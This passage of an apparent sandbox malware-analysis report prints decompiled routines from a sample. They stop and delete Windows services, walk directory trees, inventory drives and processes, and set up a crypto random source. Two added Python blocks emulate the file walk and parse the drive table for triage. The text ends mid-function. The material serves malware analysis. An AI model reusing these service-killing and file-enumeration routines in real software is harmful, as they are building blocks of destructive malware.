            						CloseServiceHandle(_t58);
            						goto L1;
            					}
            				}
            				L1:
            				return 0;
            			}


            APIs
            • OpenSCManagerW.SECHOST(00000000,ServicesActive,00000004,00000000,00000000), ref: 009B3B80
            • EnumServicesStatusExW.ADVAPI32(00000000,00000000,00000030,00000001,00000000,00000000,?,?,00000000,00000000), ref: 009B3BAB
            • RtlGetLastWin32Error.NTDLL ref: 009B3BB5
            • CloseServiceHandle.ADVAPI32(00000000), ref: 009B3BC2
              • Part of subcall function 009B494C: HeapCreate.KERNELBASE(00000000,00100000,00000000,?,009B1C68,?,?,009B150F), ref: 009B4961
              • Part of subcall function 009B494C: GetProcessHeap.KERNEL32(?,009B1C68,?,?,009B150F), ref: 009B4970
            • CloseServiceHandle.ADVAPI32(00000000), ref: 009B3BDE
            • EnumServicesStatusExW.ADVAPI32(00000000,00000000,00000030,00000001,00000000,?,?,?,00000000,00000000), ref: 009B3BFF
            • OpenServiceW.ADVAPI32(00000000,00000000,00010020), ref: 009B3C57
            • ControlService.ADVAPI32(00000000,00000001,?), ref: 009B3C7A
            • DeleteService.ADVAPI32(?), ref: 009B3C88
            • CloseServiceHandle.ADVAPI32(00000000), ref: 009B3CBD
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            • Associated: 00000000.00000002.573798858.00000000009B0000.00000002.00020000.sdmp
            • Associated: 00000000.00000002.573820908.00000000009BD000.00000002.00020000.sdmp
            • Associated: 00000000.00000002.573830437.00000000009C0000.00000004.00020000.sdmp
            • Associated: 00000000.00000002.573838962.00000000009C3000.00000008.00020000.sdmp
            • Associated: 00000000.00000002.573853514.00000000009D0000.00000002.00020000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_9b0000_Sample_5fba9b06c7da400016eb6275.jbxd
            Yara matches
            Similarity
            • API ID: Service$CloseHandle$EnumHeapOpenServicesStatus$ControlCreateDeleteErrorLastManagerProcessWin32
            • String ID: ServicesActive
            • API String ID: 2778422472-3071072050
            • Opcode ID: fcf80861785c6388d34fd47a7e56419dc5dedd6de5debf317fc4d9357a164e18
            • Instruction ID: 2254b08eca235ab977ff7298242495511a0b3ad1c538facffbeedab9733bb13a
            • Opcode Fuzzy Hash: fcf80861785c6388d34fd47a7e56419dc5dedd6de5debf317fc4d9357a164e18
            • Instruction Fuzzy Hash: 66417F75E04219BBDB20DBA5DE48EEFBFBCEF45760F108416B905F2251E6309A40DBA4
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            C-Code - Quality: 79%
            			E009B766A(WCHAR* _a4, int _a8) {
            				signed int _v8;
            				intOrPtr* _v12;
            				signed int _v16;
            				signed int _v20;
            				signed int _v24;
            				intOrPtr _v28;
            				struct _WIN32_FIND_DATAW _v620;
            				int _t66;
            				signed int _t68;
            				void* _t70;
            				signed int _t73;
            				int _t75;
            				signed int _t77;
            				intOrPtr _t82;
            				signed int _t84;
            				void* _t86;
            				signed int _t89;
            				void* _t93;
            				signed int _t98;
            				signed int _t99;
            				intOrPtr* _t103;
            				void* _t104;
            				signed int _t112;
            				int _t119;
            				signed int* _t120;
            				WCHAR* _t121;
            				intOrPtr* _t122;
            				intOrPtr* _t123;
            				intOrPtr* _t124;
            
            				_t121 = _a4;
            				_t120 = _a8;
            				_t103 = 0;
            				_v8 = 0;
            				_v12 = 0;
            				_v20 = 0;
            				_v16 = 0;
            				_t120[1](_t121, 0);
            				if(0 == 0) {
            					goto L24;
            				} else {
            					E009B7944( &_v20, _t121);
            					_t66 = _t120[0xa](_t120[3], _t121, 0);
            					_t124 = _t124 + 0x14;
            					_t120[6] = _t120[6] + _t66;
            					asm("adc [edi+0x1c], edx");
            					L23:
            					_t103 = _v12;
            					L24:
            					while( *_t120 == 0) {
            						_t66 = _v20 | _v16;
            						__eflags = _t66;
            						if(_t66 != 0) {
            							E009B61F8(_t121,  *_t103);
            							_t123 = _t103;
            							_t103 =  *((intOrPtr*)(_t103 + 4));
            							_v12 = _t103;
            							E009B4999( *_t123);
            							E009B4999(_t123);
            							_t124 = _t124 + 0x10;
            							_t112 = _v16;
            							_t98 = _v20 + 0xffffffff;
            							_v20 = _t98;
            							asm("adc ecx, 0xffffffff");
            							_t99 = _t98 | _t112;
            							__eflags = _t99;
            							_v16 = _t112;
            							if(_t99 == 0) {
            								_t21 =  &_v8;
            								 *_t21 = _v8 & _t99;
            								__eflags =  *_t21;
            							}
            							_t121 = _a4;
            							_t66 = 1;
            							__eflags = 1;
            						}
            						__eflags = _t66;
            						if(_t66 == 0) {
            							L27:
            							while(_t103 != 0) {
            								_t122 = _t103;
            								_t103 =  *((intOrPtr*)(_t103 + 4));
            								E009B4999( *_t122);
            								_t66 = E009B4999(_t122);
            							}
            							return _t66;
            						}
            						_t68 = E009B62A1(_t121);
            						 *_t124 = 0x9bd2b0;
            						_push(_t121);
            						_v24 = _t68;
            						E009B6116(__eflags);
            						_t70 = E009B5408();
            						__eflags = _t70 - 0x601;
            						if(_t70 < 0x601) {
            							_t66 = FindFirstFileW(_t121,  &_v620);
            						} else {
            							_t66 = FindFirstFileExW(_t121, 1,  &_v620, 0, 0, 2); // executed
            						}
            						_a8 = _t66;
            						__eflags = _t66 - 0xffffffff;
            						if(_t66 == 0xffffffff) {
            							continue;
            						} else {
            							_t104 = _t66;
            							while(1) {
            								_t73 = E009B6197( &(_v620.cFileName), 0x9bd03c);
            								__eflags = _t73;
            								if(_t73 != 0) {
            									_t77 = E009B6197( &(_v620.cFileName), 0x9bd2a8);
            									__eflags = _t77;
            									if(_t77 != 0) {
            										__eflags = _v620.dwFileAttributes & 0x00000400;
            										if((_v620.dwFileAttributes & 0x00000400) == 0) {
            											E009B61F8( &(_t121[_v24]),  &(_v620.cFileName));
            											__eflags = _v620.dwFileAttributes & 0x00000010;
            											if(__eflags == 0) {
            												_t119 = _v620.nFileSizeHigh;
            												_t82 = _v620.nFileSizeLow;
            												_v28 = _t82;
            												_a8 = _t119;
            												_t84 = _t120[2](_t121,  &(_v620.cFileName), _t82, _t119);
            												_t124 = _t124 + 0x10;
            												__eflags = _t84;
            												if(_t84 != 0) {
            													_t86 = _t120[0xb](_t120[4], _t121,  &(_v620.cFileName), _v28, _a8);
            													_t124 = _t124 + 0x14;
            													_t120[8] = _t120[8] + _t86;
            													asm("adc [edi+0x24], edx");
            												}
            											} else {
            												E009B6116(__eflags, _t121, 0x9bd2b4);
            												_t89 = _t120[1](_t121,  &(_v620.cFileName));
            												_t124 = _t124 + 0x10;
            												__eflags = _t89;
            												if(_t89 != 0) {
            													E009B7944( &_v20, _t121);
            													_t93 = _t120[0xa](_t120[3], _t121,  &(_v620.cFileName));
            													_t124 = _t124 + 0x14;
            													_t120[6] = _t120[6] + _t93;
            													asm("adc [edi+0x1c], edx");
            												}
            											}
            										}
            									}
            								}
            								__eflags =  *_t120;
            								if( *_t120 != 0) {
            									break;
            								}
            								_t75 = FindNextFileW(_t104,  &_v620); // executed
            								__eflags = _t75;
            								if(_t75 != 0) {
            									continue;
            								}
            								break;
            							}
            							_t66 = FindClose(_t104); // executed
            							goto L23;
            						}
            					}
            					goto L27;
            				}
            }

            Instruction address column for this listing: 0x009b7675 to 0x009b7894

            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            • Associated: 00000000.00000002.573798858.00000000009B0000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573820908.00000000009BD000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573830437.00000000009C0000.00000004.00020000.sdmp Download File
            • Associated: 00000000.00000002.573838962.00000000009C3000.00000008.00020000.sdmp Download File
            • Associated: 00000000.00000002.573853514.00000000009D0000.00000002.00020000.sdmp Download File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_9b0000_Sample_5fba9b06c7da400016eb6275.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 4f593e2b685eb813b2f1837de58ad48f358120d7a6595127c0024425e12505e0
            • Instruction ID: 4c4cfa9765967d5cc9df452610a9d0cb0edb344054db4ba68fcc25111abd6110
            • Opcode Fuzzy Hash: 4f593e2b685eb813b2f1837de58ad48f358120d7a6595127c0024425e12505e0
            • Instruction Fuzzy Hash: 4061827190461AAFDB10AFA4CD89AEEB7BCFF45330F10426AF915E2141E775EA50CB90
            Uniqueness

            Uniqueness Score: -1.00%
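
Control-flow emulation of the enumeration loop decompiled above, added here as an example; it is not code from the sample and not part of the Joe Sandbox output. The routine appends a search pattern to the current path (the string constants at 0x9bd2b0 and 0x9bd2b4 are not shown on this page), opens it with FindFirstFileW when E009B5408 returns less than 0x601 and with FindFirstFileExW(FindExInfoBasic, FIND_FIRST_EX_LARGE_FETCH) otherwise (reading 0x601 as a packed 6.1, i.e. Windows 7, is an inference), then for every entry skips the two names compared against 0x9bd03c and 0x9bd2a8 (assumed below to be "." and ".."), skips anything carrying FILE_ATTRIBUTE_REPARSE_POINT (0x400), queues directories (attribute 0x10) that pass the callback at _t120[1] and reports them to _t120[0xa], and hands files that pass _t120[2] to _t120[0xb]. Both handler results are added into 64-bit counters (the add/adc pairs at _t120[6] and _t120[8]) and the listing ends as soon as *_t120 becomes non-zero. What the real handlers do with each file or directory is not visible on this page; the tree walked below is constructed test data.

```python
"""Control-flow emulation of the directory-enumeration loop decompiled above.

Added example: this is not code from the sample or from the sandbox report.
The tree it walks is constructed test data; on Windows the real routine drives
FindFirstFileW / FindFirstFileExW / FindNextFileW and passes nFileSizeLow and
nFileSizeHigh separately, which are combined into one int here.
"""
from collections import deque
from dataclasses import dataclass, field
from typing import Callable, Deque, Dict, List, Tuple

FILE_ATTRIBUTE_DIRECTORY = 0x10        # tested as dwFileAttributes & 0x10
FILE_ATTRIBUTE_REPARSE_POINT = 0x400   # tested as dwFileAttributes & 0x400
MASK64 = (1 << 64) - 1                 # the add/adc pairs keep 64-bit running totals
SKIPPED_NAMES = (".", "..")            # assumed meaning of the constants at 0x9bd03c / 0x9bd2a8


@dataclass
class Entry:
    """One directory entry: attributes plus a size (files) or children (directories)."""
    attributes: int = 0
    size: int = 0
    children: Dict[str, "Entry"] = field(default_factory=dict)


@dataclass
class WalkContext:
    """Models the table the routine receives in edi (_t120)."""
    stop: bool = False                                                           # *_t120
    dir_filter: Callable[[str, str], bool] = lambda path, name: True             # _t120[1]
    file_filter: Callable[[str, str, int], bool] = lambda path, name, size: True  # _t120[2]
    dir_handler: Callable[[str, str], int] = lambda path, name: 1                # _t120[0xa]
    file_handler: Callable[[str, str, int], int] = lambda path, name, size: size  # _t120[0xb]
    dir_total: int = 0                                                           # _t120[6], _t120[7]
    file_total: int = 0                                                          # _t120[8], _t120[9]
    visited: List[str] = field(default_factory=list)                             # directories actually opened


def walk(ctx: WalkContext, root: str, tree: Dict[str, Entry]) -> WalkContext:
    """Drain a work list of directories, processing each listing like the decompiled loop."""
    pending: Deque[Tuple[str, Dict[str, Entry]]] = deque([(root, tree)])
    while pending and not ctx.stop:
        path, listing = pending.popleft()
        ctx.visited.append(path)
        for name, entry in listing.items():            # FindFirstFile... / FindNextFileW
            if name in SKIPPED_NAMES:
                pass
            elif entry.attributes & FILE_ATTRIBUTE_REPARSE_POINT:
                pass                                   # junctions and symlinks are neither entered nor handed on
            elif entry.attributes & FILE_ATTRIBUTE_DIRECTORY:
                if ctx.dir_filter(path, name):
                    pending.append((path + "\\" + name, entry.children))   # E009B7944 queues the directory
                    ctx.dir_total = (ctx.dir_total + ctx.dir_handler(path, name)) & MASK64
            elif ctx.file_filter(path, name, entry.size):
                ctx.file_total = (ctx.file_total + ctx.file_handler(path, name, entry.size)) & MASK64
            if ctx.stop:                               # *_t120 != 0 ends the listing early
                break
    return ctx


def demo() -> WalkContext:
    """Run the walk over a constructed tree; the .tmp filter stands in for _t120[2]."""
    tree = {
        ".": Entry(FILE_ATTRIBUTE_DIRECTORY),
        "..": Entry(FILE_ATTRIBUTE_DIRECTORY),
        "notes.txt": Entry(0, 1200),
        "Documents": Entry(FILE_ATTRIBUTE_DIRECTORY, children={
            "report.docx": Entry(0, 48_000),
            "cache.tmp": Entry(0, 10),
        }),
        "Junction": Entry(FILE_ATTRIBUTE_DIRECTORY | FILE_ATTRIBUTE_REPARSE_POINT, children={
            "unreachable.txt": Entry(0, 5),
        }),
        "image.iso": Entry(0, 5 * (1 << 32)),          # needs nFileSizeHigh on the real API
    }
    ctx = WalkContext(file_filter=lambda path, name, size: not name.endswith(".tmp"))
    return walk(ctx, "C:", tree)


if __name__ == "__main__":
    result = demo()
    print(result.visited, result.dir_total, result.file_total)
```

Two things the emulation makes visible: a junction or symlink is never entered and never reaches the file handler, so a reparse-point loop cannot trap the walker, and a file larger than 4 GiB is handled only because the routine carries nFileSizeHigh alongside nFileSizeLow and accumulates with adc.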

            C-Code - Quality: 100%
            			E009B595D() {
            				long _t3;
            				long _t4;
            
            				timeBeginPeriod(1);
            				_t4 = timeGetTime();
            				do {
            					Sleep(1); // executed
            					_t3 = timeGetTime();
            				} while (_t4 == _t3);
            				return _t3;
            }

            Instruction address column for this listing: 0x009b5960 to 0x009b5981

            APIs
            • timeBeginPeriod.WINMM(00000001,?,009B58C9,00000000,00000000,00000000,?,00000030,00000000,?,?,009B6829,?,00000020,00000000), ref: 009B5960
            • timeGetTime.WINMM(?,009B6829,?,00000020,00000000,?,009B67D2,?,?,009B24D2,?,009C2180), ref: 009B5966
            • Sleep.KERNELBASE(00000001,?,009B6829,?,00000020,00000000,?,009B67D2,?,?,009B24D2,?,009C2180), ref: 009B5970
            • timeGetTime.WINMM(?,009B6829,?,00000020,00000000,?,009B67D2,?,?,009B24D2,?,009C2180), ref: 009B5976
            Similarity
            • API ID: time$Time$BeginPeriodSleep
            • String ID:
            • API String ID: 4118631919-0
            • Opcode ID: 1978574dce5d1b3665b15097c6e43123c3994ea4f15310be8ba4d800974a421e
            • Instruction ID: f8bed29b3fbbf41926827d60f6ee811ba7ef921356ffc42fe77f7bdda777c8f1
            • Opcode Fuzzy Hash: 1978574dce5d1b3665b15097c6e43123c3994ea4f15310be8ba4d800974a421e
            • Instruction Fuzzy Hash: 21C012358181508FD3103760BC0CFD97A70AB067E1F450250F917D50E3CA514CC1969C

            C-Code - Quality: 100%
            			E009B4CD4(signed int* _a4) {
            				signed int _v8;
            				int _v12;
            				intOrPtr _v16;
            				short _v20;
            				union _ULARGE_INTEGER _v28;
            				intOrPtr _t23;
            				int _t31;
            				short _t34;
            				long _t40;
            				void* _t41;
            				short _t42;
            				void* _t45;
            				signed int _t46;
            				void* _t47;
            				union _ULARGE_INTEGER* _t49;
            				signed int _t50;
            
            				_t46 = 0;
            				_t50 = 0;
            				_v8 = 0;
            				_t41 = 0;
            				_t47 = 0x5a;
            				L1:
            				while(1) {
            					if(_t41 == 0) {
            						L5:
            						_t42 =  *0x9bd144; // 0x3a0041
            						_t23 =  *0x9bd148; // 0x5c
            						_v20 = _t42;
            						_v16 = _t23;
            						if(_t42 > _t47) {
            							L14:
            							_t46 = _v8;
            							_t41 = _t41 + 1;
            							if(_t41 > 1) {
            								L17:
            								return _t46;
            							}
            							continue;
            						}
            						_t6 = _t46 + 0xe; // 0xe
            						_t49 = _t6 + _t50 * 0x16;
            						do {
            							_t31 = GetDriveTypeW( &_v20); // executed
            							_v12 = _t31;
            							if(E009B7906(_t31) != 0) {
            								if(_t41 != 0) {
            									 *((short*)(_t49 - 0xe)) = _v20;
            									 *(_t49 - 0xc) = _v12;
            									_t13 = _t49 - 8; // 0x6
            									_t40 = GetDiskFreeSpaceExW( &_v20,  &_v28, _t13, _t49); // executed
            									if(_t40 == 0) {
            										_t49->LowPart = _t40;
            										_t49->LowPart.HighPart = _t40;
            										 *(_t49 - 8) = _t40;
            										 *(_t49 - 4) = _t40;
            									}
            								}
            								_t50 = _t50 + 1;
            								_t49 = _t49 + 0x16;
            							}
            							_t34 = _v20 + 1;
            							_t45 = 0x5a;
            							_v20 = _t34;
            						} while (_t34 <= _t45);
            						_t47 = _t45;
            						goto L14;
            					}
            					if(_t50 == 0) {
            						L16:
            						 *_a4 =  *_a4 & 0x00000000;
            						goto L17;
            					}
            					_t46 = E009B494C(_t50 * 0x16);
            					_v8 = _t46;
            					if(_t46 == 0) {
            						goto L16;
            					}
            					 *_a4 = _t50;
            					_t50 = 0;
            					goto L5;
            				}
            }

            Instruction address column for this listing: 0x009b4cdd to 0x009b4db1

            APIs
            • GetDriveTypeW.KERNELBASE(?,00000001,00000000,009C0270,?,?,?,?,009B1A3E,?), ref: 009B4D35
            • GetDiskFreeSpaceExW.KERNELBASE(?,?,00000006,0000000E,?,?,?,?,009B1A3E,?), ref: 009B4D68
            Similarity
            • API ID: DiskDriveFreeSpaceType
            • String ID: A:\
            • API String ID: 1419299958-3379428675
            • Opcode ID: a6f035e20d8e09f0a87cec9f1aaee591317ead2a2231ad9b42debbdf80bd0c75
            • Instruction ID: e1d28b22aa0f173a875134d698f9e034c72ebc49f1549861a199ec84a8374082
            • Opcode Fuzzy Hash: a6f035e20d8e09f0a87cec9f1aaee591317ead2a2231ad9b42debbdf80bd0c75
            • Instruction Fuzzy Hash: AA219676E0431A9FD714DFA9DA44AEFF7BCFF84720B14462AE904D7242E73099419B90
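
Reader and builder for the per-drive record array that E009B4CD4 produces, added as an example; it is not the sample's code. The write offsets in the routine give one 0x16-byte record per accepted drive: a WCHAR drive letter at +0 (*(_t49 - 0xe)), the GetDriveTypeW result at +2 (*(_t49 - 0xc)), and the two 64-bit values GetDiskFreeSpaceExW stores through its third and fourth output parameters at +6 (_t49 - 8, total bytes) and +0xe (_t49, total free bytes); the first output parameter lands in the local _v28 and is discarded. The sweep runs A:\ to Z:\ twice: the first pass only counts letters accepted by E009B7906 so that E009B494C can allocate count * 0x16 bytes and the count can be stored through _a4, and the second pass fills the records, zeroing both 64-bit fields whenever GetDiskFreeSpaceExW returns FALSE. E009B7906 is not shown on this page, so the demo assumes it accepts DRIVE_REMOVABLE (2) and DRIVE_FIXED (3); the drive map it runs against is constructed test data standing in for the two Windows APIs.

```python
"""Reader and builder for the per-drive record array produced by E009B4CD4.

Added example, not code from the sample. The record layout is inferred from
the write offsets in the decompiled routine; the drive map used in demo() is
constructed test data standing in for GetDriveTypeW / GetDiskFreeSpaceExW.
"""
import struct
from typing import Callable, List, NamedTuple, Optional, Tuple

# Record layout (stride 0x16 = 22 bytes, record base = _t49 - 0xe):
#   +0x00  WCHAR  drive letter, written as *(_t49 - 0xe)
#   +0x02  DWORD  GetDriveTypeW result, written as *(_t49 - 0xc)
#   +0x06  QWORD  lpTotalNumberOfBytes     (3rd GetDiskFreeSpaceExW out-param, _t49 - 8)
#   +0x0e  QWORD  lpTotalNumberOfFreeBytes (4th out-param, _t49)
RECORD = struct.Struct("<HIQQ")
assert RECORD.size == 0x16

DRIVE_UNKNOWN, DRIVE_NO_ROOT_DIR, DRIVE_REMOVABLE, DRIVE_FIXED = 0, 1, 2, 3
DRIVE_REMOTE, DRIVE_CDROM, DRIVE_RAMDISK = 4, 5, 6
ROOTS = [chr(c) + ":\\" for c in range(ord("A"), ord("Z") + 1)]   # the A:\ .. Z:\ sweep


class DriveRecord(NamedTuple):
    letter: str
    drive_type: int
    total_bytes: int
    free_bytes: int


def build_drive_table(
    get_drive_type: Callable[[str], int],
    get_disk_free_space: Callable[[str], Optional[Tuple[int, int]]],
    accept: Callable[[int], bool],
) -> Tuple[bytes, int]:
    """Two passes over A:\\..Z:\\: count accepted drives, then fill the records."""
    count = sum(1 for root in ROOTS if accept(get_drive_type(root)))
    if count == 0:
        return b"", 0                       # the routine stores 0 through _a4 and returns NULL
    out = bytearray()
    for root in ROOTS:                      # GetDriveTypeW is queried again on the second pass
        drive_type = get_drive_type(root)
        if not accept(drive_type):
            continue
        space = get_disk_free_space(root)   # None models a FALSE return
        total, free = space if space is not None else (0, 0)   # both QWORDs zeroed on failure
        out += RECORD.pack(ord(root[0]), drive_type, total, free)
    return bytes(out), count


def parse_drive_table(blob: bytes, count: int) -> List[DriveRecord]:
    """Read `count` records back, e.g. from a memory dump of the allocated array."""
    records = []
    for i in range(count):
        letter, drive_type, total, free = RECORD.unpack_from(blob, i * RECORD.size)
        records.append(DriveRecord(chr(letter), drive_type, total, free))
    return records


def demo() -> List[DriveRecord]:
    """Constructed environment: A: removable, C: fixed, D: CD-ROM, Z: network share."""
    fake_types = {"A:\\": DRIVE_REMOVABLE, "C:\\": DRIVE_FIXED,
                  "D:\\": DRIVE_CDROM, "Z:\\": DRIVE_REMOTE}
    fake_space = {"C:\\": (500 * 2**30, 120 * 2**30)}   # A: has no medium, so the size query fails
    blob, count = build_drive_table(
        lambda root: fake_types.get(root, DRIVE_NO_ROOT_DIR),
        lambda root: fake_space.get(root),
        lambda drive_type: drive_type in (DRIVE_REMOVABLE, DRIVE_FIXED),   # assumed E009B7906 policy
    )
    return parse_drive_table(blob, count)


if __name__ == "__main__":
    for record in demo():
        print(record)
```

parse_drive_table is the part worth keeping for triage: pointed at the count * 0x16 bytes E009B494C hands back (the heap created at 0x9c1da0), it lists which volumes the sample considered worth touching, including a removable drive whose size query failed and therefore carries zeroed counters.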

            C-Code - Quality: 75%
            			E009B5425(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
            				void* _v560;
            				void* _t8;
            				struct tagPROCESSENTRY32W* _t9;
            				int _t19;
            				void* _t20;
            
            				_t19 = 0;
            				_t8 = CreateToolhelp32Snapshot(2, 0); // executed
            				_t20 = _t8;
            				if(_t20 != 0xffffffff) {
            					_t9 =  &_v560;
            					_v560 = 0x22c;
            					Process32FirstW(_t20, _t9); // executed
            					while(_t9 != 0) {
            						_t19 = _a12(_a8,  &_v560);
            						if(_t19 == 0 || _a4 == 0) {
            							_t9 = Process32NextW(_t20,  &_v560); // executed
            							continue;
            						} else {
            							break;
            						}
            					}
            					E009B4BEE(_t20); // executed
            					return _t19;
            				}
            				return 0;
            }

            Instruction address column for this listing: 0x009b5430 to 0x009b5494

            APIs
            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 009B5435
            • Process32FirstW.KERNEL32(00000000,?), ref: 009B5458
            Similarity
            • API ID: CreateFirstProcess32SnapshotToolhelp32
            • String ID:
            • API String ID: 2353314856-0
            • Opcode ID: 086fd50733ba8ce115fe02086ce44d27a2ef954d02d3e0cbdae4ba4d221417b7
            • Instruction ID: 09b68788f5054662947d168c1b5e6612c42a3780633e01ed357f5ce053dd3a44
            • Opcode Fuzzy Hash: 086fd50733ba8ce115fe02086ce44d27a2ef954d02d3e0cbdae4ba4d221417b7
            • Instruction Fuzzy Hash: 2101D6355095287FD720AA75BD0CFEF77AEDB89372F2101A5FD18C2191EB348D848AA4

            C-Code - Quality: 54%
            			E009B549C(void* __edx, int _a4, intOrPtr _a8) {
            				BYTE* _v0;
            				void* _t7;
            				signed int _t11;
            				void* _t14;
            
            				_t7 = E009B586A(_a4, _a8); // executed
            				if(_t7 == 0) {
            					if(E009B550D(__edx, _a4, _a8) != 0) {
            						goto L1;
            					} else {
            						_pop(_t21);
            						if( *0x9c1dc8 != 0) {
            							L8:
            							_t11 = CryptGenRandom( *0x9c1dc4, _a4, _v0);
            							asm("sbb eax, eax");
            							return  ~( ~_t11);
            						} else {
            							_t14 =  *0x9c127c(0x9c1dc4, 0, 0, 1, 0xf0000000);
            							if(_t14 != 0) {
            								 *0x9c1dc8 = 1;
            								goto L8;
            							} else {
            								return _t14;
            							}
            						}
            					}
            				} else {
            					L1:
            					return 1;
            				}
            }

            Instruction address column for this listing: 0x009b54a5 to 0x009b575b

            APIs
            • CryptAcquireContextW.ADVAPI32(009C1DC4,00000000,00000000,00000001,F0000000,?,009B6AB5,?,00000030,00000000,?,?,009B6829,?,00000020,00000000), ref: 009B572C
            Similarity
            • API ID: AcquireContextCrypt
            • String ID:
            • API String ID: 3951991833-0
            • Opcode ID: 08a71def394ee10248fff7ec636605ee29373e0a1e38abf0c5745bd0fed32ff9
            • Instruction ID: 1d41917ab5abdf639f54da3f6d6749c447c0375fa4728143906d876b098519a8
            • Opcode Fuzzy Hash: 08a71def394ee10248fff7ec636605ee29373e0a1e38abf0c5745bd0fed32ff9
            • Instruction Fuzzy Hash: 6EF0C83665CA09BBEF111F60ED41FE53BD9AB41735F108024F60DC80E1DB7294A0A648

            C-Code - Quality: 100%
            			E009B494C(intOrPtr _a4) {
            				void* _t3;
            
            				if( *0x9c1da4 != 0) {
            					_t2 =  *0x9c1da0; // 0x2ad0000
            				} else {
            					_t2 = HeapCreate(0, 0x100000, 0); // executed
            					 *0x9c1da0 = _t2;
            					if(_t2 == 0) {
            						 *0x9c1da0 = GetProcessHeap();
            					}
            					 *0x9c1da4 = 1;
            				}
            				_t3 = E009B48EE(_t2, _a4); // executed
            				return _t3;
            }

            Instruction address column for this listing: 0x009b4956 to 0x009b4998

            APIs
            • HeapCreate.KERNELBASE(00000000,00100000,00000000,?,009B1C68,?,?,009B150F), ref: 009B4961
            • GetProcessHeap.KERNEL32(?,009B1C68,?,?,009B150F), ref: 009B4970
            Similarity
            • API ID: Heap$CreateProcess
            • String ID:
            • API String ID: 1042935442-0
            • Opcode ID: 3f5aa336edf79b61ed55aea3c7a8f2641436237cc06b5f47fbc1926b64b5a5f2
            • Instruction ID: 66e126bd13eeefecbad3876ea8246a90a8205dd934f57c3e22440ca2ef9cf507
            • Opcode Fuzzy Hash: 3f5aa336edf79b61ed55aea3c7a8f2641436237cc06b5f47fbc1926b64b5a5f2
            • Instruction Fuzzy Hash: 8AE09A35C6C3009FEB80CBA4EE05FA237ACAB067A1F000015F146C61E3E7B19140BB0D

            C-Code - Quality: 81%
            			E009BB7A2(void* __ecx, void* __eflags, void* _a4, signed char _a7, signed char* _a8, signed char _a11, signed int _a12, signed int _a15) {
            				signed char _v5;
            				signed int _v12;
            				intOrPtr* _v16;
            				char _v20;
            				signed int _v24;
            				signed int _v28;
            				intOrPtr _v32;
            				signed int _v36;
            				signed int _v40;
            				signed int _v44;
            				signed long long _v48;
            				signed int _v52;
            				signed char* _v56;
            				signed int _v60;
            				signed int _v64;
            				signed int _v68;
            				intOrPtr _v72;
            				signed char* _v76;
            				char _v80;
            				intOrPtr _v92;
            				signed char _v100;
            				void _v104;
            				intOrPtr _v108;
            				void* _v112;
            				char _v116;
            				signed int _t387;
            				void* _t390;
            				void* _t394;
            				void* _t396;
            				char _t397;
            				void* _t399;
            				void* _t400;
            				void* _t401;
            				void* _t402;
            				intOrPtr _t405;
            				intOrPtr _t410;
            				intOrPtr _t411;
            				void* _t419;
            				void* _t424;
            				void* _t431;
            				void* _t440;
            				void* _t447;
            				void* _t452;
            				signed char _t453;
            				signed int _t454;
            				void* _t456;
            				void* _t457;
            				void* _t458;
            				signed char _t460;
            				void* _t462;
            				void* _t469;
            				void* _t472;
            				void* _t473;
            				void* _t474;
            				void* _t476;
            				signed char _t481;
            				signed int _t482;
            				signed char _t483;
            				signed char _t484;
            				signed char _t519;
            				signed int _t520;
            				signed char _t521;
            				void* _t527;
            				void* _t528;
            				void* _t529;
            				void* _t531;
            				void* _t533;
            				signed int _t540;
            				void* _t546;
            				intOrPtr _t549;
            				signed int _t554;
            				void* _t561;
            				intOrPtr _t562;
            				signed char* _t567;
            				char _t568;
            				signed char* _t569;
            				signed char* _t570;
            				signed char* _t571;
            				signed char* _t572;
            				signed char* _t573;
            				signed char* _t574;
            				signed char* _t575;
            				signed char* _t576;
            				signed char* _t577;
            				signed char* _t578;
            				signed char* _t579;
            				signed char* _t580;
            				signed char* _t581;
            				signed char* _t582;
            				signed char* _t583;
            				signed char* _t584;
            				signed char* _t585;
            				signed char* _t586;
            				signed int _t588;
            				char _t590;
            				signed int _t594;
            				void* _t596;
            				signed int _t624;
            				signed int _t642;
            				signed int _t644;
            				signed int _t648;
            				signed int _t658;
            				signed int _t664;
            				signed int _t665;
            				signed int _t666;
            				intOrPtr _t667;
            				void* _t669;
            				void _t670;
            				intOrPtr _t671;
            				signed int _t674;
            				signed int _t675;
            				signed int _t676;
            				signed int _t677;
            				signed int _t683;
            				void* _t689;
            				void* _t690;
            				signed long long* _t691;
            				signed long long _t712;
            				signed long long _t715;
            
            				_v36 = 0;
            				E009B49D3( &_v116, 0, 0x34);
            				_t387 = _a12;
            				_t690 = _t689 + 0xc;
            				_v40 = 0;
            				_v52 = 0;
            				_v64 = 0;
            				_v60 = 0;
            				_t567 = _a8;
            				_v56 = _t567;
            				if(_t387 >= 3 &&  *_t567 == 0xef && _t567[1] == 0xbb && _t567[2] == 0xbf) {
            					_t567 =  &(_t567[3]);
            					_t387 = _t387 - 3;
            					_v56 = _t567;
            				}
            				_t712 =  *0x9bfbc0;
            				_v32 = _t387 + _t567;
            				_t588 = 6;
            				_t390 = memcpy( &_v104, _a4, _t588 << 2);
            				_t691 = _t690 + 0xc;
            				_v112 = _t390;
            				_v112 = _v112 - 8;
            				_v108 = _t390 - 8;
            				_v80 = 1;
            				while(1) {
            					L6:
            					_v24 = _v24 & 0x00000000;
            					_t664 = 0;
            					_v28 = _v28 & 0;
            					_t669 = 0;
            					_t642 = 8;
            					_a12 = 0;
            					_v16 = 0;
            					_v20 = 0;
            					_v12 = _t642;
            					_v72 = 1;
            					while(1) {
            						_v76 = _t567;
            						if(_t567 != _v32) {
            							_t590 =  *_t567;
            						} else {
            							_t590 = 0;
            						}
            						L10:
            						_a11 = _t590;
            						if((_t642 & 0x00000020) == 0) {
            							L71:
            							if((_v100 & 0x00000001) == 0) {
            								L100:
            								if(_t642 >= 0) {
            									if((_t642 & 0x00000008) == 0) {
